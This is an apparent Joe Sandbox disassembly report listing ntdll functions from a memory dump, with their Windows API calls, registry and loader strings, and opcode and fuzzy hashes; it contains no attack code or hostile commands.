RtlDebugPrintTimes.210A(?,?,00000000,00000000,00000001,?,?,7FFE0386), ref: 726B94DA
RtlDebugPrintTimes.210A(?,?,00000000,00000000,00000001,?,?,7FFE0386), ref: 726B94EF

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Lock$DebugExclusivePrintTimes$AcquireCurrentLoaderReleaseServiceSession
String ID:
API String ID: 732933571-0
Opcode ID: 194ae2d8dd1710530c61e124c584ce490488a13d6d03556fe863cf1160c9b6dd
Instruction ID: 34d6758257cfefe8bfa2ece902c7b7b95a5a8f18c564bc37bfcaea1853c3b6fb
Opcode Fuzzy Hash: 194ae2d8dd1710530c61e124c584ce490488a13d6d03556fe863cf1160c9b6dd
Instruction Fuzzy Hash: C3517E31A0160AAFEB0ACF68D944BAEBBB5BF44315F10416AD516973D0EB789E51CF80

Uniqueness

Uniqueness Score: -1.00%

Function 7264D730, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 126nativeCOMMON

Download Yara Rule

APIs

RtlInitUnicodeString.210A(?,Software\Policies\Microsoft\Control Panel\Desktop,00000000,00000000,7267F360), ref: 7264D76F
ZwOpenKey.210A(?,?,?,?), ref: 7264D7B4
ZwClose.210A(?), ref: 7264D817
ZwClose.210A(00000000), ref: 726A604F

Strings

Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 7264D765
@, xrefs: 7264D7AC

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Close$InitOpenStringUnicode
String ID: @$Software\Policies\Microsoft\Control Panel\Desktop
API String ID: 3420387270-3130938041
Opcode ID: 1d2750904de86d66c6a116e2b45d31237d8f294cc782bde5e3fab3eee3f87cbe
Instruction ID: dd662d77817463e6123cad4db75d1684d8ead0e349ca807e4cbb2330dc12335b
Opcode Fuzzy Hash: 1d2750904de86d66c6a116e2b45d31237d8f294cc782bde5e3fab3eee3f87cbe
Instruction Fuzzy Hash: 43417A719083059FC755CF28C480A5ABBF9AF94710F01492FF8958B290EB30DE4ACB92

Uniqueness

Uniqueness Score: -1.00%

Function 7264646B, Relevance: 10.6, APIs: 7, Instructions: 123COMMON

Download Yara Rule

APIs

RtlLcidToLocaleName.210A(?,?,00000002,00000000), ref: 726464C1
RtlGetParentLocaleName.210A(00000002,00000002,00000006,00000000,?,?,00000002,00000000), ref: 726464EA
RtlLocaleNameToLcid.210A(?,00000006,00000003,00000002,00000002,00000006,00000000,?,?,00000002,00000000), ref: 7264653D
RtlLcidToLocaleName.210A(?,?,00000002,00000001,?,?,00000002,00000000), ref: 726A268E
RtlGetParentLocaleName.210A(00000002,00000002,00000006,00000001,00000002,00000002,00000006,00000000,?,?,00000002,00000000), ref: 726A26C5

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: LocaleName$Lcid$Parent
String ID:
API String ID: 3691507993-0
Opcode ID: b68cac3157731b934ca3a175b278d9bf10adb3244737c07fba366538026de198
Instruction ID: 48b871e6444dea7d646cbc70ec7d83e9cca44147016684d5f89f057ba3070a5f
Opcode Fuzzy Hash: b68cac3157731b934ca3a175b278d9bf10adb3244737c07fba366538026de198
Instruction Fuzzy Hash: 1D415B715093469BD312CF68C840B5BBBEAAF84B54F40092FF985D7290E730CE558B96

Uniqueness

Uniqueness Score: -1.00%

Function 726892CD, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 115filenativeCOMMON

Download Yara Rule

APIs

RtlInitUnicodeString.210A(?,?,?,00000000,00000000,?,?,?,72688725,?,00000000,?,?,?,00000003,?), ref: 72689307
RtlInitUnicodeString.210A(?,00000000,?,?,?,00000000,00000000,?,?,?,72688725,?,00000000,?,?,?), ref: 72689312
ZwCreateFile.210A(00000001,C0100080,00000018,?,00000000,00000080,00000005,000000FE,00000068,00000000,00000000,?,00000000,00000000,?,00000000), ref: 72689391
ZwSetInformationFile.210A(00000001,?,?,00000028,00000004,00000001,C0100080,00000018,?,00000000,00000080,00000005,000000FE,00000068,00000000,00000000), ref: 726893C9
RtlFreeUnicodeString.210A(?,?,00000000,00000000,?,00000000,?,?,?,00000000,00000000,?,?,?,72688725), ref: 726893DC

Strings

@, xrefs: 7268937A

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: StringUnicode$FileInit$CreateFreeInformation
String ID: @
API String ID: 3523098246-2766056989
Opcode ID: d0fd6b421cfb1e0b14732d671b795fa7aa937fd7eda539f367656d61c8a3c4b9
Instruction ID: 5ed9831db27a55b2783223ee259450e3753ec725b576ea67c589c1b8766e6cff
Opcode Fuzzy Hash: d0fd6b421cfb1e0b14732d671b795fa7aa937fd7eda539f367656d61c8a3c4b9
Instruction Fuzzy Hash: C7418271D4130DABDB15CFA8D845BDEBBB9EB04700F10412BE941AB2C0E771AA05CB94

Uniqueness

Uniqueness Score: -1.00%

Function 72672700, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 110nativeCOMMON

Download Yara Rule

APIs

RtlGetSuiteMask.210A(00000000,00000000,?,?,?,?,?,\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion), ref: 72672793
RtlGetNtProductType.210A(?,00000000,00000000,?,?,?,?,?,\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion), ref: 726727B6
RtlInitUnicodeString.210A(?,TerminalServices-RemoteConnectionManager-AllowAppServerMode,?,00000000,00000000,?,?,?,?,?,\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion), ref: 726727D1
ZwQueryLicenseValue.210A(?,?,?,00000004,?,?,TerminalServices-RemoteConnectionManager-AllowAppServerMode,?,00000000,00000000,?,?,?,?,?,\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion), ref: 726727E8
RtlGetSuiteMask.210A(00000000,00000000,?,?,?,?,?,\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion), ref: 72672835

Strings

TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 726727C8

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: MaskSuite$InitLicenseProductQueryStringTypeUnicodeValue
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode
API String ID: 2592082795-996340685
Opcode ID: 5fb9a9edb8ddc104a1296d16ec4da371cd440e149b86a7a6659e3785d3668610
Instruction ID: c10deddc40e0bfaf8ce80539509a3a4043b189c63e019876d1771deac26a3684
Opcode Fuzzy Hash: 5fb9a9edb8ddc104a1296d16ec4da371cd440e149b86a7a6659e3785d3668610
Instruction Fuzzy Hash: 76417E75A007499BC725DFA8D4407E6B7F9EF09700F00492FD9AAC3380E334A555CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 7265A423, Relevance: 10.6, APIs: 7, Instructions: 109memorynativeCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.210A(?), ref: 7265A45A
RtlAllocateHeap.210A(?,00800001,00002001,?), ref: 7265A466
RtlLeaveCriticalSection.210A(?,?,00800001,00002001,?), ref: 7265A484
RtlReAllocateHeap.210A(?,00800001,00000000,-00000001,?,00800001,00002001,?), ref: 7265A4EE
ZwProtectVirtualMemory.210A(000000FF,?,00001000,00000001,?,?,?,00800001,00000000,-00000001,?,00800001,00002001,?), ref: 7265A51A
RtlLeaveCriticalSection.210A(?,?,00800001,00000000,-00000001,?,00800001,00002001,?), ref: 7265A4FE

Part of subcall function 7265DB60: RtlpNotOwnerCriticalSection.210A(?,?,?), ref: 7265DB97

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CriticalSection$AllocateHeapLeave$EnterMemoryOwnerProtectRtlpVirtual
String ID:
API String ID: 206302655-0
Opcode ID: 00621e80df6e1864bedfa8b3bb4074eb3fa6aa25c7c8963f7ac400dc385c2850
Instruction ID: 496534e428bdf5a4e7354684a59f36427d35f2f1f7b159249a2ec36d4a6d349f
Opcode Fuzzy Hash: 00621e80df6e1864bedfa8b3bb4074eb3fa6aa25c7c8963f7ac400dc385c2850
Instruction Fuzzy Hash: 9A41C631600648AFDB12CBADCC94BDEBBFAAF14350F0481A6E855973D1C674DD85CB94

Uniqueness

Uniqueness Score: -1.00%

Function 726C76FC, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 102nativeCOMMON

Download Yara Rule

APIs

ZwQueryVirtualMemory.210A(000000FF,00000000,00000004,?,00000008,00000000,727200A0,00000024,726B95D1,00000000,00000000,?,?,00000000,?), ref: 726C7721

Strings

Status: 0x%08lx, xrefs: 726C783E
Changing the protection of the executable at %p failed with status 0x%08lx, xrefs: 726C7795, 726C780D
minkernel\ntdll\ldrfind.c, xrefs: 726C775B, 726C781D, 726C784F
LdrpProtectAndRelocateImage, xrefs: 726C7751, 726C779B, 726C7813, 726C7845
Querying large page info failed with status 0x%08lx, xrefs: 726C774B

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: MemoryQueryVirtual
String ID: Changing the protection of the executable at %p failed with status 0x%08lx$LdrpProtectAndRelocateImage$Querying large page info failed with status 0x%08lx$Status: 0x%08lx$minkernel\ntdll\ldrfind.c
API String ID: 2850889275-3846273245
Opcode ID: 6e59b4ca5f4910a3aa119035c5037b57fa76988a367d396f5c4baba4daa30198
Instruction ID: 7132210bb8f320ae414c7005c361c63bb31d838919ec698d5f51bab0e6dcaa70
Opcode Fuzzy Hash: 6e59b4ca5f4910a3aa119035c5037b57fa76988a367d396f5c4baba4daa30198
Instruction Fuzzy Hash: E8313C61E0928A6AE713A26C4D45F7D3EADDF4131DF44026BED913A1C1C720E980DAE5

Uniqueness

Uniqueness Score: -1.00%

Function 7268536C, Relevance: 10.6, APIs: 7, Instructions: 92memorytimeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.210A(00000000,00000000), ref: 726853A2
RtlAcquireSRWLockExclusive.210A ref: 726853E8
RtlReleaseSRWLockExclusive.210A(72738608), ref: 72685415
RtlReleaseSRWLockExclusive.210A(72738608), ref: 72685423
RtlAcquireSRWLockExclusive.210A(72738608), ref: 72685434
RtlReleaseSRWLockExclusive.210A(72738608,72738608), ref: 72685453
RtlFreeHeap.210A(?,00000000,00000000,72738608,72738608), ref: 726BEB51

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: ExclusiveLock$Release$Acquire$DebugFreeHeapPrintTimes
String ID:
API String ID: 3380076252-0
Opcode ID: 09cdf7736117372870b3897ba09ad450abb048c38fb63a4b690047313f9ed9ec
Instruction ID: 3be280414be8f71851516047ad9641f8b9ee0d1507ef08d75e123800cc761b10
Opcode Fuzzy Hash: 09cdf7736117372870b3897ba09ad450abb048c38fb63a4b690047313f9ed9ec
Instruction Fuzzy Hash: D6312631205390DBC7239F1CCA40B1ABFB5BF80710F52152BE8565B6CACBB0D811CB82

Uniqueness

Uniqueness Score: -1.00%

Function 726593D0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 72nativeCOMMON

Download Yara Rule

APIs

ZwQueryInformationToken.210A(000000FA,00000001,?,00000050,?,00000000), ref: 726593F4
RtlLengthSidAsUnicodeString.210A(?,?,000000FA,00000001,?,00000050,?,00000000), ref: 72659404

Part of subcall function 726594A0: RtlValidSid.210A(?,00000000,?,72659409,?,?,000000FA,00000001,?,00000050,?,00000000), ref: 726594AA

RtlFreeUnicodeString.210A(00000000,?,?,00000000,00000000,\REGISTRY\USER\,?,00020019,?,?,000000FA,00000001,?,00000050,?,00000000), ref: 72659487

Part of subcall function 72662073: RtlAllocateHeap.210A(?,00000000,?,?,72659426,?,00020019,?,?,000000FA,00000001,?,00000050,?,00000000), ref: 72662086

RtlAppendUnicodeToString.210A(00000000,\REGISTRY\USER\,?,00020019,?,?,000000FA,00000001,?,00000050,?,00000000), ref: 72659433

Part of subcall function 72659980: memmove.210A(00000000,00000050,00000052,?,00000000,00000000,?,?,72659438,00000000,\REGISTRY\USER\,?,00020019,?,?,000000FA), ref: 726599D2

RtlConvertSidToUnicodeString.210A(?,?,00000000,00000000,\REGISTRY\USER\,?,00020019,?,?,000000FA,00000001,?,00000050,?,00000000), ref: 72659459

Part of subcall function 726594F0: RtlValidSid.210A(00000050,?), ref: 72659513
Part of subcall function 726594F0: wcscpy_s.210A(?,00000100,S-1-,00000000,00000050,?), ref: 7265953A

Strings

\REGISTRY\USER\, xrefs: 7265942D

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: StringUnicode$Valid$AllocateAppendConvertFreeHeapInformationLengthQueryTokenmemmovewcscpy_s
String ID: \REGISTRY\USER\
API String ID: 3017593230-2169711131
Opcode ID: 5b7747a05f371d4305707f210e7a49a240d94ad1552dfd1f81694aa4dd243bae
Instruction ID: cadae3f23bc0b65d2fe34f1472e0701b354042aa75594b4aa131433d1f27b7f8
Opcode Fuzzy Hash: 5b7747a05f371d4305707f210e7a49a240d94ad1552dfd1f81694aa4dd243bae
Instruction Fuzzy Hash: 5C216F71A012499ADB10CFEDC940AEEB7F9AF48704F10402BE945EB284FB34DE15C795

Uniqueness

Uniqueness Score: -1.00%

Function 72649210, Relevance: 10.6, APIs: 7, Instructions: 63memorynativeCOMMON

Download Yara Rule

APIs

ZwClose.210A(00000000,7271F0F8,0000000C,726491E9), ref: 7264922A
ZwClose.210A(00000000,7271F0F8,0000000C,726491E9), ref: 72649249
RtlFreeHeap.210A(?,?,?,00000000,7271F0F8,0000000C,726491E9), ref: 72649265
RtlFreeHeap.210A(?,?,00000000,?,?,?,00000000,7271F0F8,0000000C,726491E9), ref: 72649281
RtlFreeHeap.210A(?,?,?,?,?,00000000,?,?,?,00000000,7271F0F8,0000000C,726491E9), ref: 7264929D
RtlAcquireSRWLockExclusive.210A(727386B4,?,?,?,?,?,00000000,?,?,?,00000000,7271F0F8,0000000C,726491E9), ref: 726492A7
RtlFreeHeap.210A(?,?,?,727386B4,?,?,?,?,?,00000000,?,?,?,00000000,7271F0F8,0000000C), ref: 726492EA

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: FreeHeap$Close$AcquireExclusiveLock
String ID:
API String ID: 3557490396-0
Opcode ID: a9b4683a12653ff807fceb66899468149474c75821c9122023d39b0c11dc8b62
Instruction ID: f6108dbff7ad078d0ce5fc2716629c25231e87a15d6145dd89fed625fbbcf3c9
Opcode Fuzzy Hash: a9b4683a12653ff807fceb66899468149474c75821c9122023d39b0c11dc8b62
Instruction Fuzzy Hash: 3D216072041641DFC322DF6CCA40F19BBBABF05318F54456DE18A875E2DB35EA41DB48

Uniqueness

Uniqueness Score: -1.00%

Function 7270544C, Relevance: 9.3, APIs: 3, Strings: 2, Instructions: 581COMMON

Download Yara Rule

APIs

RtlInterlockedPushListSList.210A(00000001,72705B80,00000000,?,00000000), ref: 7270584A

Part of subcall function 7267E944: RtlEnterCriticalSection.210A(?), ref: 7267E97B
Part of subcall function 7267E944: RtlLeaveCriticalSection.210A(?), ref: 7267E9D9

RtlGetCurrentServiceSessionId.210A(00000000,?,00000000), ref: 727054DC
RtlGetCurrentServiceSessionId.210A(00000000,?,00000000), ref: 727059C3

Strings

Dbsr, xrefs: 7270563D
fsr, xrefs: 7270566E, 727057B0, 7270546F, 72705764, 7270571B, 72705564, 727055F4, 72705887, 72705ADC, 727059A0, 727057F7, 72705827

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CriticalCurrentListSectionServiceSession$EnterInterlockedLeavePush
String ID: fsr$Dbsr
API String ID: 2728251713-946551432
Opcode ID: b7bf45046dbbaae436bac73f61d2f1a634b97390c557753642377def8524cef7
Instruction ID: 10f4a88c93cb7134cc58477af669447c88340e66f09276f682f4c935074fbe72
Opcode Fuzzy Hash: b7bf45046dbbaae436bac73f61d2f1a634b97390c557753642377def8524cef7
Instruction Fuzzy Hash: 9B228275A002168FCB25CF5DC690BAEB7F2FF88314F644569D852EB385DB30A946CB90

Uniqueness

Uniqueness Score: -1.00%

Function 7264D319, Relevance: 9.3, APIs: 6, Instructions: 282nativeCOMMON

Download Yara Rule

APIs

memset.210A(?,00000000,000000AA,00000000,?), ref: 7264D368
ZwIsUILanguageComitted.210A(00000000,?), ref: 7264D370
RtlpGetNameFromLangInfoNode.210A(?,75FF0C75,?,00000000,?,00000000,?), ref: 7264D3FF

Part of subcall function 7264D600: RtlInitUnicodeString.210A(?,00800000,00000000,?,?,00000000,?,00000000,?), ref: 7264D646

ZwQueryInstallUILanguage.210A(?,00000000,?), ref: 726A5C89
RtlLCIDToCultureName.210A(?,?,00000000,?,00000000,?), ref: 726A5CE6

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: LanguageName$ComittedCultureFromInfoInitInstallLangNodeQueryRtlpStringUnicodememset
String ID:
API String ID: 645234790-0
Opcode ID: 697b191afb428f85fb0156fce4b355c5f1eb6e997771c761b8e90df0b0cbe1be
Instruction ID: e1e5c850969365df59f6e6b91818156bb956e14adcf4d4a764a6d8769aa594ac
Opcode Fuzzy Hash: 697b191afb428f85fb0156fce4b355c5f1eb6e997771c761b8e90df0b0cbe1be
Instruction Fuzzy Hash: 9BB18370E002658BDB69CF58C990BA9B7F6EF44704F4095EBD54AE7281EB309E85CF24

Uniqueness

Uniqueness Score: -1.00%

Function 72669600, Relevance: 9.2, APIs: 6, Instructions: 247COMMON

Download Yara Rule

APIs

RtlAcquireSRWLockExclusive.210A(727384D8,C0000225,C0000225,?,?,72669B40,?,?,00000000,?,?,00000000), ref: 72669672
RtlEqualUnicodeString.210A(?,C0000215,00000001,727384D8,C0000225,C0000225,?,?,72669B40,?,?,00000000), ref: 726696D7
RtlReleaseSRWLockExclusive.210A(727384D8,727384D8,C0000225,C0000225,?,?,72669B40,?,?,00000000,?,?,00000000), ref: 72669725
RtlEqualUnicodeString.210A(?,C000020D,00000001,727384D8,C0000225,C0000225,?,?,72669B40,?,?,00000000), ref: 7266984E
RtlGetCurrentServiceSessionId.210A(727384D8,727384D8,C0000225,C0000225,?,?,72669B40,?,?,00000000,?,?,00000000), ref: 726B0D91

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: EqualExclusiveLockStringUnicode$AcquireCurrentReleaseServiceSession
String ID:
API String ID: 2303069174-0
Opcode ID: 0bcfdf41f85422510fc64f5ca563ddd7631235f8a42f7eb3623bbb72ef647332
Instruction ID: 428ccf3e24204f263a93d7dfec992e470be63eaf3022b2b1bbf21b58c78ed264
Opcode Fuzzy Hash: 0bcfdf41f85422510fc64f5ca563ddd7631235f8a42f7eb3623bbb72ef647332
Instruction Fuzzy Hash: 8E91EF71A022858BDB06CF5DC580BBA7BB1EF45304F2588EBEC429B2D6E735DA41C761

Uniqueness

Uniqueness Score: -1.00%

Function 7267D3AC, Relevance: 9.2, APIs: 6, Instructions: 212memorynativethreadCOMMON

Download Yara Rule

APIs

RtlFreeHeap.210A(?,00000000,?,00000000,?,?,?,?,?,72643DCD,?,00000000,7271EEC0,00000084,72643A38,00000000), ref: 7267D410
RtlWakeAddressAllNoFence.210A(00000000), ref: 7267D42C

Part of subcall function 7264A6D7: RtlAcquireSRWLockExclusive.210A(?,?,00000000,?,7267D438,00000000,?,?,?,?,?,72643DCD,?,00000000,7271EEC0,00000084), ref: 7264A6E9
Part of subcall function 7264A6D7: RtlReleaseSRWLockExclusive.210A(?,?,?,00000000,?,7267D438,00000000,?,?,?,?,?,72643DCD,?,00000000,7271EEC0), ref: 7264A706

RtlWakeAddressAllNoFence.210A(00000000), ref: 7267D478
RtlRaiseStatus.210A(00000000,?,00000003,?,00000000,?,?,?,?,?,72643DCD,?,00000000,7271EEC0,00000084,72643A38), ref: 7267D494
ZwAlertThreadByThreadId.210A(FFFFFFFE,?,FFFFFFFE,FFFFFFFE), ref: 7267D5BB

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: AddressExclusiveFenceLockThreadWake$AcquireAlertFreeHeapRaiseReleaseStatus
String ID:
API String ID: 1375617-0
Opcode ID: cbe32fab32516ce8a8c2af65ec634a9dd20eec951021e7e5bf2af1d0dac5bbcb
Instruction ID: a02c70db5fd38d5aa0c8a31951960bd937851e1e1f8c2724d1fddab27a249c6b
Opcode Fuzzy Hash: cbe32fab32516ce8a8c2af65ec634a9dd20eec951021e7e5bf2af1d0dac5bbcb
Instruction Fuzzy Hash: DD61E0716003019FD71ACE2DD580B56BBF6AF85324F204A6EE95A8B3D4DB30ED45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 7265F11B, Relevance: 9.2, APIs: 6, Instructions: 202COMMON

Download Yara Rule

APIs

RtlAcquireSRWLockExclusive.210A(?), ref: 7265F1BA
RtlReleaseSRWLockExclusive.210A(?,?), ref: 7265F1CA
RtlGetCurrentServiceSessionId.210A(?,?,00000000,?,72705F5D,?,00000000), ref: 7265F230
RtlGetCurrentServiceSessionId.210A(?), ref: 7265F299
RtlEnterCriticalSection.210A(?,?,00000000,?,72705F5D,?,00000000), ref: 7265F2D0
RtlLeaveCriticalSection.210A(?,?,00000000,?,72705F5D,?,00000000), ref: 7265F2DB

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CriticalCurrentExclusiveLockSectionServiceSession$AcquireEnterLeaveRelease
String ID:
API String ID: 2376257113-0
Opcode ID: a4502ec8dcc01b4df26c366cc925dad1cc83ba399a5c00e1af8370e596436ae8
Instruction ID: 841a904ac9c02187fedfd69f3df50344fbfac509c7ac35695d02a96d0966428f
Opcode Fuzzy Hash: a4502ec8dcc01b4df26c366cc925dad1cc83ba399a5c00e1af8370e596436ae8
Instruction Fuzzy Hash: 2871FE756046919BC312CF6EC884B66B7F5FF85710F0485AAE89ACB381D734E846CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 7264B101, Relevance: 9.2, APIs: 6, Instructions: 166nativeCOMMONLIBRARYCODE

Download Yara Rule

APIs

ZwQueryDebugFilterState.210A(?,7268C327,7271F198,00000090,7264B0FE,00000003,7268C327,0000000A,00000001,00000000,0000000A,7268C327,Invalid parameter passed to C runtime function.), ref: 7264B154
_alloca_probe_16.210A(7271F198,00000090,7264B0FE,00000003,7268C327,0000000A,00000001,00000000,0000000A,7268C327,Invalid parameter passed to C runtime function.), ref: 726A558C
memcpy.210A(?,?,?,7271F198,00000090,7264B0FE,00000003,7268C327,0000000A,00000001,00000000,0000000A,7268C327), ref: 726A55BD
